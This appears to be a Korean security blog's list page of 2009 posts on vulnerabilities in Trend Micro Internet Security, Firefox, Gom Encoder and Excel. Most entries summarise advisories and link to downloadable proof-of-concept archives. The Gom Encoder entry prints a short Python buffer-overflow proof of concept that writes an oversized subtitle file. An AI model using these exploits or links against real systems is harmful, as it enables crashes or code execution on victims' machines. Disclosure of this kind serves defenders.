본문 바로가기
[TrendMicro]Trend Micro Internet Security Pro 2009 Priviliege Escalation PoC Trend Micro Internet Security Pro 2009 tmactmon.sys Priviliege Escalation PoC. by b1@ckeYe The vulnerability is caused due to the IOCTL handler of the "tmactmon.sys" driver improperly processing user space parameters. This exploit execute arbitrary code in kernel space via a specially crafted IOCTL. untested: http://milw0rm.com/sploits/2009-trendmicro_local_expl_0day.zip # milw0rm.com [2009-03-3.. 2009. 3. 31.
[Firefox]Mozilla Firefox XSL Parsing Remote Memory Corruption PoC 0day 파이어폭스 XSL 취약점으로 인한 제로데이가 발견되었당 개인적으로 파폭은 안쓰지만~ 이로인한 악성코드가 발생 할 수 있는 확률은 크다 ㅠㅠ // firefox XSL parsing remote memory corruption poc // k`sOSe - works both in windows and linux http://milw0rm.com/sploits/2009-ffox-poc.tar.gz # milw0rm.com [2009-03-25] [실제 악용 될 수 있는 코드] 2009. 3. 26.
[Gom]Gom Encoder (Subtitle File) Buffer Overflow PoC 3-16일 곰인코더 취약점이 발견되었다. 좀 더 자세한 내용이 보이면 추가해야겠다. # exploit.py # # Gom Encoder (Subtitle File) Buffer Overflow PoC # by :Encrypt3d.M!nd # # Orignal Advisory: # http://www.securityfocus.com/bid/34120 # chars = 'A' * 1000000 file = open ( 'devil_inside.srt', 'w' ) file.write ('1\n00:00:00,001 --> 00:00:06,000\n'+chars) file.close() # milw0rm.com [2009-03-16] 2009. 3. 17.
[Excel]Microsoft Excel Invalid Object Remote Code Execution Vulnerability 엑셀관련 한 취약점 정보를 확인하였다. 이제 그만좀 나왔으면 .... 원본 보기 : http://www.securityfocus.com/bid/33870/discuss Microsoft Excel is prone to a remote code-execution vulnerability. Attackers may exploit this issue by enticing victims into opening a maliciously crafted Excel file. Successful exploits may allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploit.. 2009. 2. 25.